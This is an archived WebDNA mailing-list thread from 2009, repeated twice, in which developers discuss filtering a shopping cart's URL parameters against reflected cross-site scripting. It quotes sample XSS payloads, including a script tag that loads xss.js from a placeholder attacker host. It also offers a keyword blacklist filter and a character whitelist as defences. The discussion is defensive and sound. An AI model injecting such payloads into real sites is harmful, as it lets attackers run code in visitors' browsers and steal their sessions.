Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
--------------070001060802000403050508-- Associated Messages, from the most recent to the oldest:Hi Matthew,Any specific reason you redirect to the index page?
-Jeff
On Apr 13, 2009, at 12:35 PM, Psi Prime, Matthew A Perosi wrote:
This seems to work for me.
It seems to stand up to the attacks from McAfee Secure
[formvariables]
[showif [url][name][/url]^script>][redirect /index.html][/showif]
[showif [url][name][/url]^iframe][redirect /index.html][/showif]
[text][url][name][/url]=[input][value][/input][/text]
[/formvariables]
[showif [countchars][cart][/countchars]>18][redirect/index.html][/showif]
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Marc Thompson wrote:You are correct Willian NEVER trust user input.What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on itwhatsoever.For [cart] values:[GetChars start=1&end=20][Grepsearch=[^0-9]&replace=][value][/Grep][/GetChars]For other text values:[GetChars start=1&end=100][Grep search=[^,-.%@_A-Za-z0-9ÜüÄäÖö]&replace=][value][/Grep][/GetChars]MarcWilliam DeVaul wrote:I have no idea about a server level fix. This goes to never trustinguser input. I thought it should always be surrounded by [raw] and[url] to prevent this.What do others do?BillOn Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What are people doing for the following type of attacks?http://www.example.com/shoppingcart.tpl?cart="<script>alert123</script>"I assume you could just do a [removehtml][cart][/removehtml]I know you can do something like that at the code level but is theresomething that can be done at the server level or does the new versioncicadae have built in protections?More info on the attackhttp://www.example.com/?var=<SCRIPT%20a=">"%20SRC="http://www.attacker.com/xss.js"></SCRIPT>This will exploit the reflected cross site scripting vulnerability shownbefore, executing the javascript code stored on the attacker's web server asif it was originating from the victim web site, www.example.com.A complete test will include instantiating a variable with several attackvectors (Check Fuzz vectors appendix and Encoded injection appendix).Finally, analyzing answers can get complex. A simple way to do this is touse code that pops up a dialog, as in our example. This typically indicatesthat an attacker could execute arbitrary JavaScript of his choice in thevisitors' browsers.---------------------------------------------------------This message is sent to you because you are subscribed tothe mailing list <talk@webdna.us>.To unsubscribe, E-mail to: <talk-leave@webdna.us>archives: http://mail.webdna.us/list/talk@webdna.usold archives: http://dev.webdna.us/TalkListArchive/.
|
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
--------------070001060802000403050508-- "Psi Prime, Matthew A Perosi "Hi Matthew,Any specific reason you redirect to the index page?
-Jeff
On Apr 13, 2009, at 12:35 PM, Psi Prime, Matthew A Perosi wrote:
This seems to work for me.
It seems to stand up to the attacks from McAfee Secure
[formvariables]
[showif [url][name][/url]^script>][redirect /index.html][/showif]
[showif [url][name][/url]^iframe][redirect /index.html][/showif]
[text][url][name][/url]=[input][value][/input][/text]
[/formvariables]
[showif [countchars][cart][/countchars]>18][redirect/index.html][/showif]
Matthew A Perosi JewelerWebsites.com------------------------------by Psi Prime-------Senior Web Developer 323 Union Blvd. Totowa, NJ 07512Pre-Sales: 888.872.0274Service: 973.413.8213Training: 973.413.8214Fax: 973.413.8217http://www.jewelerwebsites.comhttp://en.wikipedia.org/wiki/Psi_Prime%2C_Inchttp://www.psiprime.com
Marc Thompson wrote:You are correct Willian NEVER trust user input.What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on itwhatsoever.For [cart] values:[GetChars start=1&end=20][Grepsearch=[^0-9]&replace=][value][/Grep][/GetChars]For other text values:[GetChars start=1&end=100][Grep search=[^,-.%@_A-Za-z0-9ÜüÄäÖö]&replace=][value][/Grep][/GetChars]MarcWilliam DeVaul wrote:I have no idea about a server level fix. This goes to never trustinguser input. I thought it should always be surrounded by [raw] and[url] to prevent this.What do others do?BillOn Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What are people doing for the following type of attacks?http://www.example.com/shoppingcart.tpl?cart="<script>alert123</script>"I assume you could just do a [removehtml][cart][/removehtml]I know you can do something like that at the code level but is theresomething that can be done at the server level or does the new versioncicadae have built in protections?More info on the attackhttp://www.example.com/?var=<SCRIPT%20a=">"%20SRC="http://www.attacker.com/xss.js"></SCRIPT>This will exploit the reflected cross site scripting vulnerability shownbefore, executing the javascript code stored on the attacker's web server asif it was originating from the victim web site, www.example.com.A complete test will include instantiating a variable with several attackvectors (Check Fuzz vectors appendix and Encoded injection appendix).Finally, analyzing answers can get complex. A simple way to do this is touse code that pops up a dialog, as in our example. This typically indicatesthat an attacker could execute arbitrary JavaScript of his choice in thevisitors' browsers.---------------------------------------------------------This message is sent to you because you are subscribed tothe mailing list <talk@webdna.us>.To unsubscribe, E-mail to: <talk-leave@webdna.us>archives: http://mail.webdna.us/list/talk@webdna.usold archives: http://dev.webdna.us/TalkListArchive/.
DOWNLOAD WEBDNA NOW!
The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...